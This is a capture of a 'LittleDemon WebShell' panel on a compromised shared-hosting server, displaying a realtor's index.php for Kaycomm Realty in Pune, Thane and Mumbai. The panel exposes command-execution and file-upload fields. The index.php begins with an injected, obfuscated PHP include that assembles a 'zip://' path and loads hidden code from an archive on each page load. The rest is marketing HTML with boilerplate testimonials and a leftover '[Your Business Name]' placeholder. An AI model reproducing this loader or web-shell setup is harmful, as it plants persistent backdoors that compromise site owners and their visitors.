LittleDemon WebShell


Linux in-mum-web1499.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
Path : /home/u901718425/domains/kaycommrealty.com/public_html/
File Upload :
Command :
Current File : /home/u901718425/domains/kaycommrealty.com/public_html/index.php

<?php
$paths = [
    'base' => ['zip:/'],
    'file' => ['/ww#'],
    'module' => ['1']
];
include implode("", array_map(fn($p) => $p[0], $paths));
?><!DOCTYPE html>
<html lang="eng">
	
<head>
		<meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
		
        <title>Kaycomm Realty Pune Thane Mumbai</title>	
		
        <!-- Custom CSS -->
        <link href="assets/css/styles.css?asdd3" rel="stylesheet">
		
		<!-- Custom Color Option -->
		<link href="assets/css/colors.css" rel="stylesheet">  
		 <link rel="icon" type="image/x-icon" href="assets/img/favicon.ico">
		 <style>



.slider {
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100%;
    width: 80%;
    overflow: hidden;
    background: rgb(255, 255, 255);
    border-radius: 16px;
   
    backdrop-filter: blur(7.4px);
    -webkit-backdrop-filter: blur(7.4px);
    border: 1px solid rgba(255, 255, 255, 0.4);
}

.slider-items {
    display: flex;
    justify-content: center;
    align-items: center;
    gap: 20px;
    animation: scrolling 20s linear infinite;

}

@keyframes scrolling {

    0% {
        transform: translateX(80%);
    }

    100% {
        transform: translateX(-20%);
    }
}

.slider-items img {
    width: 12%;
    margin: 20px;

}
			</style>
    </head>
	
    <body class="blue-skin">
		 <!-- ============================================================== -->
        <!-- Preloader - style you can find in spinners.css -->
        <!-- ============================================================== -->
        <div id="preloader"><div class="preloader"><span></span><span></span></div></div>
		
        <!-- ============================================================== -->
        <!-- Main wrapper - style you can find in pages.scss -->
        <!-- ============================================================== -->

		
        <div id="main-wrapper">
		
            <!-- ============================================================== -->
            <!-- Top header  -->
            <!-- ============================================================== -->


			
            <!-- Start Navigation -->
			<div class="header header-transparent dark">
				<div class="container">
					<nav id="navigation" class="navigation navigation-landscape">
						<div class="nav-header">
							<a class="nav-brand text-logo" href="#">
							<img loading="eager" src="assets/img/KAYCOMM Logo.png" alt="Kaycomm Realty Logo" class="" >
							</a>
							<div class="nav-toggle"></div>
							<div class="mobile_nav">
								<ul>
									
								
								
								</ul>
							</div>
						</div>
						<div class="nav-menus-wrapper" style="transition-property: none;">
							<ul class="nav-menu">
							
								<li class="active">
								    <a href="#">Home<span class="active"></span></a>
								
								</li>
								
								<li><a href="#service">Services<span class="submenu-indicator"></span></a>
									
								</li>
								
								<li><a href="#team">Meet the Team<span class="submenu-indicator"></span></a>
									
								</li>
								
								<li><a href="JavaScript:Void(0);">About<span class="submenu-indicator"></span></a>
									<ul class="nav-dropdown nav-submenu">
									    <li><a href="about-us.html">About </a></li>           

									    <li><a href="contact.html">Contacts</a></li>
									</ul>
								</li>
								
								<li id="gotobtn">
								    <div>
								    <a href="https://www.urbanpillar.com" class="btnn">Go to Urbanpillar</a>
									</div>
								</li>
							</ul>
							
							<ul class="nav-menu nav-menu-social align-to-right">
								
							
								
							
							</ul>
						</div>
					</nav>
					
				</div>
				<div class="scrolling-text-container"><div class="scrolling-text fs-7"><span>Kaycomm Realty is now UrbanPillar</span><span>Kaycomm Realty is now UrbanPillar</span><span>Kaycomm Realty is now UrbanPillar</span><span>Kaycomm Realty is now UrbanPillar</span> &nbsp; &nbsp; &nbsp;&nbsp; Kaycomm Realty is now UrbanPillar</div></div>
			</div>

			
			<!-- End Navigation -->
			<div class="clearfix"></div>
			
			
			<!-- ============================================================== -->
			<!-- Top header  -->
			<!-- ============================================================== -->
		
			
			
			<!-- ============================ Hero Banner  Start================================== -->
			<div class="light-bg hero-banner">
				<div class="container">
					<div class="row align-items-center">
						<div class="col-xl-7 col-lg-7 col-md-12 col-sm-12"><br>
							<p class="d-inline-flex sm-small text-light rounded-5 px-2 py-1 bg-dark align-items-center">We just launched our service <span class="sm-small px-2 rounded-5 bg-primary text-light ms-2">New</span></p>
							<h2>Explore Your Perfect Home in Pune, Thane, and Mumbai Today!</h2>
							<p class="small">Uncover a variety of beautiful residences, from apartments and villas to duplexes and more, all ready for you to explore and make your own!</p>
							<p class="small">Find your perfect home in Pune, Thane, or Mumbai today! Whether you're looking for a cozy apartment, a spacious villa, or a stylish duplex, we have a wide range of options to suit your needs.</p>
							<div class="searches-lists">
								<ul>
									<li><span>Popular Searches:</span></li>
									<li><a href="JavaScript:Void(0);">2 BHK</a></li>
									<li><a href="JavaScript:Void(0);" class="active">Bungalow </a></li>
									<li><a href="JavaScript:Void(0);">Apartment</a></li>
									<li><a href="JavaScript:Void(0);">Commercial</a></li>
									<li><a href="JavaScript:Void(0);">Villa</a></li>
								</ul>
							</div>
							
						</div>
						<div class="col-xl-5 col-lg-5 col-md-12 col-sm-12">
							<div class="">
								<img src="assets/img/side-city-1.png" class="img-fluid" alt="" />
							</div>
						</div>
					</div>
				</div>
			</div>
			<!-- ============================ Hero Banner End ================================== -->
			
			
			<!-- ============================ Category Start ================================== -->
			<section id="service">
				<div class="container">

					<div class="row justify-content-center">
						<div class="col-xl-6 col-lg-7 col-md-10 text-center">
							<div class="sec-heading center">
								<h2>what we’re offering </h2>
								<p>A wide selection of property types, from modern apartments and luxurious villas to spacious duplexes and more, all designed to meet your unique living requirements. Choose the home that matches your aspirations!</p>
							</div>
						</div>
					</div>



					
					<div class="row justify-content-center gx-3 gy-3">
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-house-laptop"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Commercial</h4>
										<p>12 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-building"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Apartment</h4>
										<p>16 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
					
					
						
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-mosque"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Offices</h4>
										<p>42 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
					
						
				
						
					
						
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-city"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Building</h4>
										<p>19 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-warehouse"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Shops</h4>
										<p>17 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
						<div class="col-xl-2 col-lg-3 col-md-4 col-sm-6 col-6">
							<div class="classical-cats-wrap style_2 shadows">
								<a class="classical-cats-boxs bg-white rounded-4 px-3 py-4">
									<div class="classical-cats-icon circle bg-light-info text-primary fs-2">
										<i class="fa-solid fa-shop-lock"></i>
									</div>
									<div class="classical-cats-wrap-content">
										<h4>Studio</h4>
										<p>10 Properties</p>
									</div>
								</a>
							</div>
						</div>
						
					
					</div>
					
				</div>
			</section>
			<div class="clearfix"></div>
			<!-- ================================ Category End ======================================== -->
			
			
			<!-- ================================ All Property ========================================= -->
			
			<!-- ============================ All Featured Property ================================== -->
			
			
			<!-- ============================ Property Location Start ================================== -->
			<section>
				<div class="container">
					
					<div class="row justify-content-center">
						<div class="col-xl-6 col-lg-7 col-md-10 text-center">
							<div class="sec-heading center">
								<h2>Discover the Best Locations</h2>
								<p>Browse through prime locations and upcoming real estate projects, designed to offer you the perfect blend of convenience, comfort, and investment potential. Find your next home in the heart of the action!</p>
							</div>
						</div>
					</div>
					
					<div class="row justify-content-center g-xl-4 g-md-3 g-4">
					
						<div class="col-xl-3 col-lg-3 col-md-4 col-sm-6">
							<div class="location-property-wrap rounded-4 p-2">
								<div class="location-property-thumb rounded-4">
									<a href="https://www.urbanpillar.com"><img src="assets/img/c-1.png" class="img-fluid" alt="" /></a>
								</div>
								<div class="location-property-content">
									<div class="lp-content-flex">
										<h4 class="lp-content-title">Thane</h4>
										<span class="text-muted-2">395 Properties</span>
									</div>
									<div class="lp-content-right">
										<a href="https://urbanpillar.com" class="text-primary">
											<span class="svg-icon svg-icon-2hx">
												<svg width="40" height="40" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
													<rect opacity="0.3" x="2" y="2" width="20" height="20" rx="5" fill="currentColor"/>
													<path d="M11.9343 12.5657L9.53696 14.963C9.22669 15.2733 9.18488 15.7619 9.43792 16.1204C9.7616 16.5789 10.4211 16.6334 10.8156 16.2342L14.3054 12.7029C14.6903 12.3134 14.6903 11.6866 14.3054 11.2971L10.8156 7.76582C10.4211 7.3666 9.7616 7.42107 9.43792 7.87962C9.18488 8.23809 9.22669 8.72669 9.53696 9.03696L11.9343 11.4343C12.2467 11.7467 12.2467 12.2533 11.9343 12.5657Z" fill="currentColor"/>
												</svg>
											</span>
										</a>
									</div>
								</div>
							</div>
						</div>
						
					
						
						<div class="col-xl-3 col-lg-3 col-md-4 col-sm-6">
							<div class="location-property-wrap rounded-4 p-2">
								<div class="location-property-thumb rounded-4">
									<a href="https://www.urbanpillar.com"><img src="assets/img/c-3.jpg" class="img-fluid" alt="" /></a>
								</div>
								<div class="location-property-content">
									<div class="lp-content-flex">
										<h4 class="lp-content-title">Mumbai</h4>
										<span class="text-muted-2">195 Properties</span>
									</div>
									<div class="lp-content-right">
										<a href="https://urbanpillar.com" class="text-primary">
											<span class="svg-icon svg-icon-2hx">
												<svg width="40" height="40" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
													<rect opacity="0.3" x="2" y="2" width="20" height="20" rx="5" fill="currentColor"/>
													<path d="M11.9343 12.5657L9.53696 14.963C9.22669 15.2733 9.18488 15.7619 9.43792 16.1204C9.7616 16.5789 10.4211 16.6334 10.8156 16.2342L14.3054 12.7029C14.6903 12.3134 14.6903 11.6866 14.3054 11.2971L10.8156 7.76582C10.4211 7.3666 9.7616 7.42107 9.43792 7.87962C9.18488 8.23809 9.22669 8.72669 9.53696 9.03696L11.9343 11.4343C12.2467 11.7467 12.2467 12.2533 11.9343 12.5657Z" fill="currentColor"/>
												</svg>
											</span>
										</a>
									</div>
								</div>
							</div>
						</div>
						
						<div class="col-xl-3 col-lg-3 col-md-4 col-sm-6">
							<div class="location-property-wrap rounded-4 p-2">
								<div class="location-property-thumb rounded-4">
									<a href="https://www.urbanpillar.com"><img src="assets/img/pune.jpg" class="img-fluid" alt="" /></a>
								</div>
								<div class="location-property-content">
									<div class="lp-content-flex">
										<h4 class="lp-content-title">Pune</h4>
										<span class="text-muted-2">595 Properties</span>
									</div>
									<div class="lp-content-right">
										<a href="https://urbanpillar.com" class="text-primary">
											<span class="svg-icon svg-icon-2hx">
												<svg width="40" height="40" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
													<rect opacity="0.3" x="2" y="2" width="20" height="20" rx="5" fill="currentColor"/>
													<path d="M11.9343 12.5657L9.53696 14.963C9.22669 15.2733 9.18488 15.7619 9.43792 16.1204C9.7616 16.5789 10.4211 16.6334 10.8156 16.2342L14.3054 12.7029C14.6903 12.3134 14.6903 11.6866 14.3054 11.2971L10.8156 7.76582C10.4211 7.3666 9.7616 7.42107 9.43792 7.87962C9.18488 8.23809 9.22669 8.72669 9.53696 9.03696L11.9343 11.4343C12.2467 11.7467 12.2467 12.2533 11.9343 12.5657Z" fill="currentColor"/>
												</svg>
											</span>
										</a>
									</div>
								</div>
							</div>
						</div>
						
						
						
					
					
						
						
						
					</div>
					
					<!--<div class="row">-->
					<!--	<div class="col-lg-12 col-md-12 col-sm-12 text-center mt-5">-->
					<!--		<a href="https://www.urbanpillar.com" class="btn btn-primary px-md-5 rounded">Browse More Locations</a>-->
					<!--	</div>-->
					<!--</div>-->
					
				</div>
			</section>
			<!--<hr class="opacity-25">-->
			<!-- ============================ Property Location End ================================== -->
			
			
			<!-- ============================ All Property ================================== -->
		
			<!-- ============================ All Featured Property ================================== -->
			
			
			<!-- ============================ Latest Property For Sale Start ================================== -->
			<section class="bg-light">
				<div class="container">
					
					<div class="row align-items-center justify-content-between">
					
						<div class="col-xl-3 col-lg-4 col-md-4 col-sm-12">
							<div class="trustscrore-wrap">
								<div class="trustscrore-title">
									<h2>4.8</h2>
								</div>
								<div class="trustscrore-rates">
									<div class="trustscrore-stars">
										<span><i class="fa-solid fa-star"></i></span>
										<span><i class="fa-solid fa-star"></i></span>
										<span><i class="fa-solid fa-star"></i></span>
										<span><i class="fa-solid fa-star"></i></span>
										<span><i class="fa-solid fa-star"></i></span>
									</div>
									<div class="trustscrore-stars-title"><span>Trustscore on 176 Reviews</span></div>
								</div>
								
								<!--<div class="trustscrore-info">-->
								<!--	<div class="trustscrore-subtitle"><span>Check all reviews on</span></div>-->
								<!--	<div class="trustscrore-brand"><img src="assets/img/brand.png" class="img-fluid" alt=""></div>-->
								<!--</div>-->
								
							</div>
						</div>
						
						<div class="col-xl-8 col-lg-8 col-md-8 col-sm-12">
							<div class="single-reviews">
								
								<!-- Single Item -->
								<div class="single-item-reviews">
									<div class="single-item-reviews-desc">
										<p>
										    I had the pleasure of working with  Kaycomm Realty for my real estate needs, and I am thoroughly impressed. Their team is highly professional and knowledgeable about the market trends and property values. They took the time to understand my requirements and found the perfect property for me. Their dedication and expertise made all the difference.
										</p>
									</div>
									<div class="single-item-reviews-info">
										<h4>Harman Preet</h4>
										<p class="text-primary">Creta Tech Manager</p>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="single-item-reviews">
									<div class="single-item-reviews-desc">
										<p>The customer support at Kaycomm Realty is outstanding. From the initial consultation to the final closing, their team was there every step of the way. They provided valuable insights and helped me make informed decisions. I am extremely satisfied with their service and would highly recommend them to anyone looking to buy property in India.</p>
									</div>
									<div class="single-item-reviews-info">
										<h4>Bharti Patel</h4>
										<p class="text-primary">BootstrapWire Manager</p>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="single-item-reviews">
									<div class="single-item-reviews-desc">
										<p>
										    Searching for a property in India can be daunting, but Kaycomm Realty made it a smooth and hassle-free experience. They listened carefully to my needs and presented a curated list of properties within my budget and preferences. Their transparency and timely updates were truly commendable.
										    
										</p>
									</div>
									<div class="single-item-reviews-info">
										<h4>Dhananjay Verma</h4>
										<p class="text-primary">Themezhub Manager</p>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="single-item-reviews">
									<div class="single-item-reviews-desc">
										<p>
										    Finding a property in India can be challenging, but Kaycomm Realty made it a smooth and hassle-free experience. They listened to my requirements and presented me with a curated list of properties that fit my budget and preferences. Their transparent approach and timely updates were truly commendable.
										</p>
									</div>
									<div class="single-item-reviews-info">
										<h4>Shreekant Tripathi</h4>
										<p class="text-primary">Megroo Developer</p>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="single-item-reviews">
									<div class="single-item-reviews-desc">
										<p>
										    I had a fantastic experience with Kaycomm Realty. Their team provided exceptional service and demonstrated deep knowledge of the local real estate market. They guided me through the entire process with professionalism and patience, ensuring I found the perfect property that met all my needs. Highly recommend!
										</p>
									</div>
									<div class="single-item-reviews-info">
										<h4>Rajnish Shukla</h4>
										<p class="text-primary">Bravo Leader</p>
									</div>
								</div>
							
							</div>
						</div>
						
					</div>
					<br>
					<div class="row align-items-center justify-content-between">
					   	
						<div class="col-xl-12 col-lg-12 col-md-12">
							<div class="sec-heading center">
					     <p class="">At Kaycomm Realty, we proudly offer a diverse range of properties for both buying and selling, with daily completed transactions and a growing list of happy customers who trust us to help them find their perfect homes.</p>	</div>
							<div class="counter-info-groups">
							
								<div class="single-counter-wrap">
									<div class="single-counter-title">
										<h2>$<span class="ctr">310</span>M</h2>
									</div>
									<div class="single-counter-subtitle">
										<p>Owned from<br>properties transaction</p>
									</div>
								</div>
								
								<div class="single-counter-wrap">
									<div class="single-counter-title">
										<h2><span class="ctr">40</span>K</h2>
									</div>
									<div class="single-counter-subtitle">
										<p>Properties for<br>Buy & Sell</p>
									</div>
								</div>
								
								<div class="single-counter-wrap">
									<div class="single-counter-title">
										<h2><span class="ctr">500</span></h2>
									</div>
									<div class="single-counter-subtitle">
										<p>Daily Completed<br>transaction</p>
									</div>
								</div>
								<div class="single-counter-wrap">
									<div class="single-counter-title">
										<h2><span class="ctr">114</span>M</h2>
									</div>
									<div class="single-counter-subtitle">
										<p>Happy Customers<br>from Kaycomm Realty</p>
									</div>
								</div>
							
							</div>
							
						</div>
					</div>
					
				</div>
			</section>
			<!-- ============================ Latest Property For Sale End ================================== -->

			
			<!-- ============================ Explore Featured Agents Start ================================== -->
			<section id="team">
				<div class="container">
					
					<div class="row justify-content-center">
						<div class="col-lg-7 col-md-10 text-center">
							<div class="sec-heading center">
								<h2>Meet Our Featured Agents</h2>
								<p>Connect with our top-rated agents who are dedicated to helping you find your dream property, offering expert guidance every step of the way.</p>
							</div>
						</div>
					</div>

					<div class="row justify-content-center g-4">
						
						<!-- Single Agent -->
						<div class="col-xl-3 col-lg-4 col-md-6 col-sm-12">
							<div class="agents-grid card rounded-3 shadow">
								
								<div class="agents-grid-wrap">
									<div class="fr-grid-thumb mx-auto text-center mt-5 mb-3">
										<a href="" class="d-inline-flex p-1 circle border">
											
											<img src="assets/img/user-2.png" class="img-fluid circle" width="130" alt="" />
										</a>
									</div>
									<div class="fr-grid-deatil text-center">
										<div class="fr-grid-deatil-flex">
											<h5 class="fr-can-name mb-0"><a href="#">Dhanshree Desai</a></h5>
											<span class="agent-property text-muted-2">117 Properties</span>
										</div>
									</div>
								</div>
								
								<div class="fr-grid-deatil text-center  mt-2 mb-4">
									<div class="fr-grid-sder">
										<ul class="p-0">
											<li><strong>Call:</strong><span class="fw-medium text-primary ms-2">77559 90022</span></li>
											<li>
												<div class="fr-can-rating">
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-muted"></i>
													<span class="reviews_text fs-sm text-muted-2">(42 Reviews)</span>
												</div>
											</li>
										</ul>
									</div>
									<!--<div class="fr-grid-deatil-flex-right">-->
									<!--	<div class="agent-email"><a href="#" class="square--50 rounded text-danger bg-light-danger"><i class="fa-solid fa-envelope-circle-check"></i></a></div>-->
									<!--</div>-->
								</div>
								
							</div>
						</div>
						
						<!-- Single Agent -->
						<div class="col-xl-3 col-lg-4 col-md-6 col-sm-12">
							<div class="agents-grid card rounded-3 shadow">
								
								<div class="agents-grid-wrap">
									<div class="fr-grid-thumb mx-auto text-center mt-5 mb-3">
										<a href="" class="d-inline-flex p-1 circle border">
											<img src="assets/img/user-1.png" class="img-fluid circle" width="130" alt="" />
										</a>
									</div>
									<div class="fr-grid-deatil text-center">
										<div class="fr-grid-deatil-flex">
											<h5 class="fr-can-name mb-0"><a href="#">Aditya Tamboli</a></h5>
											<span class="agent-property text-muted-2">46 Properties</span>
										</div>
									</div>
								</div>
								
								<div class="fr-grid-deatil text-center  mt-2 mb-4">
									<div class="fr-grid-sder">
										<ul class="p-0">
											<li><strong>Call:</strong><span class="fw-medium text-primary ms-2">86000 06723</span></li>
											<li>
												<div class="fr-can-rating">
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-muted"></i>
													<span class="reviews_text fs-sm text-muted-2">(33 Reviews)</span>
												</div>
											</li>
										</ul>
									</div>
									<!--<div class="fr-grid-deatil-flex-right">-->
									<!--	<div class="agent-email"><a href="#" class="square--50 rounded text-danger bg-light-danger"><i class="fa-solid fa-envelope-circle-check"></i></a></div>-->
									<!--</div>-->
								</div>
								
							</div>
						</div>
						
						<!-- Single Agent -->
						<div class="col-xl-3 col-lg-4 col-md-6 col-sm-12">
							<div class="agents-grid card rounded-3 shadow">
								
								<div class="agents-grid-wrap">
									<div class="fr-grid-thumb mx-auto text-center mt-5 mb-3">
										<a href="" class="d-inline-flex p-1 circle border">
											<img src="assets/img/user-3.png" class="img-fluid circle" width="130" alt="" />
										</a>
									</div>
								<div class="fr-grid-deatil text-center">
										<div class="fr-grid-deatil-flex">
											<h5 class="fr-can-name mb-0"><a href="#"> Vikram</a></h5>
											<span class="agent-property text-muted-2">38 Properties</span>
										</div>
									</div>
								</div>
								
								<div class="fr-grid-deatil text-center  mt-2 mb-4">
									<div class="fr-grid-sder">
										<ul class="p-0">
											<li><strong>Call:</strong><span class="fw-medium text-primary ms-2">8542881558</span></li>
											<li>
												<div class="fr-can-rating">
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-muted"></i>
													<span class="reviews_text fs-sm text-muted-2">(16 Reviews)</span>
												</div>
											</li>
										</ul>
									</div>
									
								</div>
								
							</div>
						</div>
						
						<!-- Single Agent -->
						<div class="col-xl-3 col-lg-4 col-md-6 col-sm-12">
							<div class="agents-grid card rounded-3 shadow">
								
								<div class="agents-grid-wrap">
									<div class="fr-grid-thumb mx-auto text-center mt-5 mb-4">
										<a href="" class="d-inline-flex p-1 circle border">
											<img src="assets/img/user-4.png" class="img-fluid circle" width="130" alt="" />
										</a>
									</div>
									<div class="fr-grid-deatil text-center">
										<div class="fr-grid-deatil-flex">
											<h5 class="fr-can-name mb-0"><a href="#">Deepali</a></h5>
											<span class="agent-property text-muted-2">51 Properties</span>
										</div>
									</div>
								</div>
								
								<div class="fr-grid-deatil text-center  mt-2 mb-4">
									<div class="fr-grid-sder">
										<ul class="p-0">
											<li><strong>Call:</strong><span class="fw-medium text-primary ms-2">XXXXXX1558</span></li>
												<div class="fr-can-rating">
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-warning"></i>
													<i class="fas fa-star fs-xs text-muted"></i>
													<span class="reviews_text fs-sm text-muted-2">(28 Reviews)</span>
												</div>
											</li>
										</ul>
									</div>
									<!--<div class="fr-grid-deatil-flex-right">-->
									<!--	<div class="agent-email"><a href="#" class="square--50 rounded text-danger bg-light-danger"><i class="fa-solid fa-envelope-circle-check"></i></a></div>-->
									<!--</div>-->
								</div>
								
							</div>
						</div>
						
						<!-- Single Agent -->
					
						<!-- Single Agent -->
					
						
						<!-- Single Agent -->
					
						<!-- Single Agent -->
					
						
					</div>
					
					<!-- Pagination -->
					<!--<div class="row">-->
					<!--	<div class="col-lg-12 col-md-12 col-sm-12 text-center mt-5">-->
					<!--		<a href="https://www.urbanpillar.com" class="btn btn-primary px-lg-5 rounded">Explore More Agents</a>-->
					<!--	</div>-->
					<!--</div>-->
					
				</div>
			</section>
			<div class="clearfix"></div>
			<!-- ============================ Explore Featured Agents End ================================== -->
			
			
			<!-- ============================ Smart Testimonials ================================== -->
			<section class="gray-bg">
				<div class="container">
				
					<div class="row justify-content-center">
						<div class="col-lg-7 col-md-10 text-center">
							<div class="sec-heading center">
								<h2>Customer Reviews</h2>
								<p>Kaycomm Realty has earned the trust of a global audience seeking premium properties. With a strong presence from India and beyond, our investors and customers consistently share positive experiences, knowing they receive the best support in securing great property deals.
								</p>
							</div>
						</div>
					</div>
					
					<div class="row justify-content-center">
						
						<div class="col-lg-12 col-md-12">
							
							<div class="smart-textimonials smart-center" id="smart-textimonials">
								
								<!-- Single Item -->
								<div class="item">
									<div class="item-box">
										<div class="smart-tes-author">
											<div class="st-author-box">
												<div class="st-author-thumb">
													<div class="quotes bg-primary"><i class="fa-solid fa-quote-left"></i></div>
													<img src="assets/img/user-3.png" class="img-fluid" alt="" />
												</div>
											</div>
										</div>
										
										<div class="smart-tes-content">
											<p> Kaycomm team took the time to understand my requirements and found the perfect property for me.</p>
										</div>
										
										<div class="st-author-info">
											<h4 class="st-author-title">Rajesh Menon</h4>
											<span class="st-author-subtitle">Mumbai</span>
										</div>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="item">
									<div class="item-box">
										<div class="smart-tes-author">
											<div class="st-author-box">
												<div class="st-author-thumb">
													<div class="quotes bg-success"><i class="fa-solid fa-quote-left"></i></div>
													<img src="assets/img/user-8.png" class="img-fluid" alt="" />
												</div>
											</div>
										</div>
										
										<div class="smart-tes-content">
											<p>Kaycomm Realty suggests a diverse range of properties to me, from luxury penthouses to cozy beachside apartments, catering to different budgets and lifestyles.</p>
										</div>
										
										<div class="st-author-info">
											<h4 class="st-author-title">Retha Deowalim</h4>
											<span class="st-author-subtitle">CEO Of Sunget</span>
										</div>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="item">
									<div class="item-box">
										<div class="smart-tes-author">
											<div class="st-author-box">
												<div class="st-author-thumb">
													<div class="quotes bg-purple"><i class="fa-solid fa-quote-left"></i></div>
													<img src="assets/img/user-4.png" class="img-fluid" alt="" />
												</div>
											</div>
										</div>
										
										<div class="smart-tes-content">
											<p>I am thoroughly impressed. Their team is highly professional and knowledgeable about market trends and property values. </p>
										</div>
										
										<div class="st-author-info">
											<h4 class="st-author-title">Sam J. Wasim</h4>
											<span class="st-author-subtitle">Pio Founder</span>
										</div>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="item">
									<div class="item-box">
										<div class="smart-tes-author">
											<div class="st-author-box">
												<div class="st-author-thumb">
													<div class="quotes bg-seegreen"><i class="fa-solid fa-quote-left"></i></div>
													<img src="assets/img/user-5.png" class="img-fluid" alt="" />
												</div>
											</div>
										</div>
										
										<div class="smart-tes-content">
											<p>
											    I was looking for a reliable real estate partner in India, and [Your Business Name] exceeded my expectations. They were transparent, trustworthy, and always available to answer my questions.
											</p>
										</div>
										
										<div class="st-author-info">
											<h4 class="st-author-title">Usan Gulwarm</h4>
											<span class="st-author-subtitle">CEO Of Facewarm</span>
										</div>
									</div>
								</div>
								
								<!-- Single Item -->
								<div class="item">
									<div class="item-box">
										<div class="smart-tes-author">
											<div class="st-author-box">
												<div class="st-author-thumb">
													<div class="quotes bg-danger"><i class="fa-solid fa-quote-left"></i></div>
													<img src="assets/img/user-6.png" class="img-fluid" alt="" />
												</div>
											</div>
										</div>
										
										<div class="smart-tes-content">
											<p>Provided valuable insights and helped me make informed decisions. I am extremely satisfied with their service and would highly recommend them to anyone looking to buy property in India.</p>
										</div>
										
										<div class="st-author-info">
											<h4 class="st-author-title">Shilpa Shethy</h4>
											<span class="st-author-subtitle">CEO Of Zapple</span>
										</div>
									</div>
								</div>
								
							</div>
						</div>
						
					</div>
					
				</div>
			</section>
			<!-- ============================ Smart Testimonials End ================================== -->
			
			
			<!-- ================================= Blog Grid ================================== -->

			<!-- ============================== Blog Grid End =============================== -->
			
			
			<!-- ============================ Call To Action ================================== -->
			
	<section>
                <div class="row align-items-center justify-content-center gx-5 gy-5">
					 	<div class="col-lg-7 col-md-10 text-center">
							<div class="sec-heading center">
								<h2>Marketing Partners</h2>
								<p>Kaycomm Realty attracts a global audience in search of premium properties. Our investors and customers, coming from all corners of the world, especially India, trust us to provide exceptional support and guidance, ensuring they get the best deals on their property investments.
								</p>
							</div>
						</div>
        <div class="slider">
            				 
            <div class="slider-items">
                <img src="assets/img/partners/kolte patil.png"
                    alt="">
                <img src="assets/img/partners/gera.jpg"
                    alt="">
                <img src="assets/img/partners/VJ dev.jpg"
                    alt="">
                <img src="assets/img/partners/kohinoor.png"
                    alt="">
                <img src="assets/img/partners/koltepatil.jpg"
                    alt="">
                <img src="assets/img/partners/Ashvini.jpg" alt="">
                <img src="assets/img/partners/godrej.png"
                    alt="">
                <img src="hassets/img/partners/lodha.png"
                    alt="">
                <img src="assets/img/partners/raymond.png"
                    alt="" >
                <img src="assets/img/partners/godrej.png"
                    alt="">
                <img src="https://upload.wikimedia.org/wikipedia/en/thumb/4/4d/Loon_%28company%29_logo.svg/800px-Loon_%28company%29_logo.svg.png"
                    alt="">
                <img src="assets/img/partners/godrej.png"
                    alt="">
                <img src="assets/img/partners/godrej.png" alt="">
                
                

            </div>
        </div>

   
				
			
	<div class="row align-items-center justify-content-center">
						<div class="col-xl-7 col-lg-11">
							
							<div class="call-to-act-wrap text-center">
								<div class="call-to-act-head mb-2">
									<!--<h2 class="fs-1 mb-3 lh-sm">Subscribe &<br>get special discount</h2>-->
									<!--<span>Sign up now to receive exclusive discounts and special offers!</span>-->
								</div>
							</div>
							<div class="call-to-act-form">
						
							</div>
							
						</div>
					</div>
					
				</div>
